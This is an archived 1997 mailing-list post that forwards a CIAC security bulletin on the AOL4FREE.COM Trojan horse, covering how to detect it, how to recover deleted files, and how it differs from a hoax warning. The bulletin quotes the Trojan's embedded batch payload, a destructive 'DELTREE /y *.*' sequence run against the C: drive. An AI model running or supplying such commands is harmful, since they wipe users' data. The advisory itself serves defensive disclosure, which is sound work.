Folks, I always get a little "antsy" when posts like this come across. The following is a post I received in reponse to a question re: the "AOL4FREE.COM" file posted to another list: This is a long post, but _please_ take the time to read it through. For further reading, try: <underline>http://ciac.llnl.gov/ciac/bulletins/h-47a.shtml </underline> (The post below) <underline>http://www.kumite.com/myths</underline> (This topic and related, interesting reading.) >__________________________________________________________ >> >> The U.S. Department of Energy >> Computer Incident Advisory Capability >> ___ __ __ _ ___ >> / | /_\ / >> \___ __|__ / \ \___ >> __________________________________________________________ >> >> INFORMATION BULLETIN >> >> AOL4FREE.COM Trojan Horse Program Destroys Hard Drives >> >>April 16, 1997 18:00 GMT >Number H-47 >>_____________________________________________________________________ >_________ >>PROBLEM: A Trojan Horse program called AOL4FREE.COM that >deletes all >> files on a hard drive is circulating the Internet. >>PLATFORM: DOS/Windows-based PCs >>DAMAGE: When the AOL4FREE.COM program is executed, all files and >> directories on the users C: drive are deleted. >>SOLUTION: DO NOT execute this program. If the program starts >executing, >> quickly pressing Ctrl-C will save some of your files. >>_____________________________________________________________________ >_________ >>VULNERABILITY Users who download the trojaned AOL4FREE.COM program and >>ASSESSMENT: executes it will destroy all the files and >directories on their >> DOS C: drive. >>_____________________________________________________________________ >_________ >> >>NOTE: THIS IS DIFFERENT FROM THE AOL4FREE HOAX MESSAGE. >> >>CIAC has obtained a Trojaned copy of AOL4FREE.COM that destroys hard >drives. >> >>CIAC has obtained a Trojaned copy of the AOL4FREE.COM program that, >if run, >>deletes all the files on a user's hard drive. If you are e-mailed >this file, >>or if you have downloaded it from an online service, do not attempt >to run it. >>If the program was received as an attachment to an e-mail message, >do not >>double click (open) it. Opening an attached program runs that >program, which >>in this case deletes all the files on your hard drive. The original >>AOL4FREE.COM was a program for fraudulently creating free AOL >(America Online) >>accounts. Note that any attempt to use the original AOL4FREE.COM >program may >>subject you to prosecution. >> >>NOTE: Most antivirus programs will not detect this or other Trojan >Horse >> programs. >> >>Detection >>========= >> >>AOL4FREE.COM is a Trojan program that is 993 bytes (2 sectors) long. >>It masquerades as the AOL4FREE program that allows the fraudulent >creation of >>free AOL accounts. The following text is readable in the >AOL4FREE.COM file >>if you display it with the DOS TYPE command or the DOS EDIT program. >> >>Compiled by BAT2EXEC 1.5 >>PC Magazine . Douglas Boling >> >>Note that this text may appear in any program compiled with the >BAT2EXEC >>program and has nothing to do with the Trojan Horse. >> >>If you open the AOL4FREE.COM file with a disk editor or with the >Windows >>Notepad program, the following text is found at the end of the >second sector >>of the file. >> >>PATH >>COMMANDC earc >>/C C: >>/C CD\ >>DELTREE /y *.* >>ECHOOYOUR COMPUTER HAS JUST BEEN F***ED BY *VP* F*** YOU AOL-LAMER >> >>Where F*** is a common vulgar explicative. >> >>Recovery >>======== >> >>Pressing Ctrl-C before the Trojan Horse finishes deleting all your >files will >>save some of them. If the program runs to completion, all the files on >>your root drive will have been deleted. The files are deleted with the >>DOS DELTREE command, so the contents of the files are still on your >hard >>disk, only the directory entries have been deleted. Any program that >can >>recover deleted files will allow you to recover some or all of the >files >>on your hard disk. >> >>While attempting to recover files, be sure to not write any new >files onto >>the hard disk as the new files may overwrite the contents of a >deleted file, >>making it impossible to recover. You will probably have to boot your >system >>with a floppy and run any recovery programs from there. >> >>If you happen to have one of the delete tracking programs installed >on your >>system (a program that keeps track of deleted files in case you want >them >>back) the recovery operation will be relatively simple. Follow the >directions >>in your delete tracking program to recover your files. If not, you will >>probably have to recover each file individually, supplying the first >character >>of the file name, which is overwritten in the directory when the >file is >>deleted. Most DOS/Windows disk tools programs also have the >capability for >>recovering deleted files so follow the directions included with >those programs >>to do so. >> >>Background >>========== >> >>The original AOL4FREE.COM program was developed to fraudulently >create free >>AOL accounts. The creator of that program has pleaded guilty to >defrauding >>America Online for distributing that program. Anyone else attempting >to use >>that program to defraud AOL could also be prosecuted. >> >>An e-mail message was recently circulating about the Internet that >warned of >>an AOL4FREE virus, but that warning is either a hoax or a badly >misunderstood >>description of this Trojan Horse. >>1. This program is a Trojan Horse, not a virus. It does not spread >on its own. >>2. A Trojan Horse must be run to do any damage. >>3. Reading an e-mail message with the Trojan Horse program as an >attachment >> will not run the Trojan Horse and will not do any damage. Note that >> opening an attached program from within an e-mail reader runs that >> attached program, which may make it appear that reading the >attachment >> caused the damage. Users should keep in mind that any file with >a .COM or >> .EXE extension is a program, not a document and that double >clicking or >> opening that program will run it. >> >>CIAC still affirms that reading an e-mail message, even one with an >attached >>program, can not do damage to a system. The attachment must be both >downloaded >>onto the system and run to do any damage. >> >>CIAC, the Computer Incident Advisory Capability, is the computer >>security incident response team for the U.S. Department of Energy >>(DOE) and the emergency backup response team for the National >>Institutes of Health (NIH). CIAC is located at the Lawrence Livermore >>National Laboratory in Livermore, California. CIAC is also a founding >>member of FIRST, the Forum of Incident Response and Security Teams, a >>global organization established to foster cooperation and coordination >>among computer security teams worldwide. >> >>CIAC services are available to DOE, DOE contractors, and the NIH. CIAC >>can be contacted at: >> Voice: +1 510-422-8193 >> FAX: +1 510-423-8002 >> STU-III: +1 510-423-2604 >> E-mail: ciac@llnl.gov >> >>For emergencies and off-hour assistance, DOE, DOE contractor sites, >>and the NIH may contact CIAC 24-hours a day. During off hours (5PM - >>8AM PST), call the CIAC voice number 510-422-8193 and leave a message, >>or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two >>Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC >>duty person, and the secondary PIN number, 8550074 is for the CIAC >>Project Leader. >> >>Previous CIAC notices, anti-virus software, and other information are >>available from the CIAC Computer Security Archive. >> >> World Wide Web: http://ciac.llnl.gov/ >> Anonymous FTP: ciac.llnl.gov (128.115.19.53) >> Modem access: +1 (510) 423-4753 (28.8K baud) >> +1 (510) 423-3331 (28.8K baud) >> >>CIAC has several self-subscribing mailing lists for electronic >>publications: >>1. CIAC-BULLETIN for Advisories, highest priority - time critical >> information and Bulletins, important computer security information; >>2. CIAC-NOTES for Notes, a collection of computer security articles; >>3. SPI-ANNOUNCE for official news about Security Profile Inspector >> (SPI) software updates, new features, distribution and >> availability; >>4. SPI-NOTES, for discussion of problems and solutions regarding the >> use of SPI products. >> >>Our mailing lists are managed by a public domain software package >>called Majordomo, which ignores E-mail header subject lines. To >>subscribe (add yourself) to one of our mailing lists, send the >>following request as the E-mail message body, substituting >>ciac-bulletin, ciac-notes, spi-announce OR spi-notes for list-name: >> >>E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov: >> subscribe list-name >> e.g., subscribe ciac-notes >> >>You will receive an acknowledgment email immediately with a >confirmation >>that you will need to mail back to the addresses above, as per the >>instructions in the email. This is a partial protection to make sure >>you are really the one who asked to be signed up for the list in >question. >> >>If you include the word 'help' in the body of an email to the above >address, >>it will also send back an information file on how to >subscribe/unsubscribe, >>get past issues of CIAC bulletins via email, etc. >> >>PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing >>communities receive CIAC bulletins. If you are not part of these >>communities, please contact your agency's response team to report >>incidents. Your agency's team will coordinate with CIAC. The Forum of >>Incident Response and Security Teams (FIRST) is a world-wide >>organization. A list of FIRST member organizations and their >>constituencies can be obtained via WWW at http://www.first.org/. >> >>This document was prepared as an account of work sponsored by an >>agency of the United States Government. Neither the United States >>Government nor the University of California nor any of their >>employees, makes any warranty, express or implied, or assumes any >>legal liability or responsibility for the accuracy, completeness, or >>usefulness of any information, apparatus, product, or process >>disclosed, or represents that its use would not infringe privately >>owned rights. Reference herein to any specific commercial products, >>process, or service by trade name, trademark, manufacturer, or >>otherwise, does not necessarily constitute or imply its endorsement, >>recommendation or favoring by the United States Government or the >>University of California. The views and opinions of authors expressed >>herein do not necessarily state or reflect those of the United States >>Government or the University of California, and shall not be used for >>advertising or product endorsement purposes. >> If you're still with me, thanks for taking the time. Best to all, with hopes for virus-free, politically correct computing. Horace Horace Greeley hgreeley@leland.stanford.edu "The defining statistic of death is that it has a one to one ratio." - George Bernard Shaw LiNCS voice: 415/725-4627 Stanford University fax: 415/725-9942
This PTG archive page provided courtesy of Moy Piano Service, LLC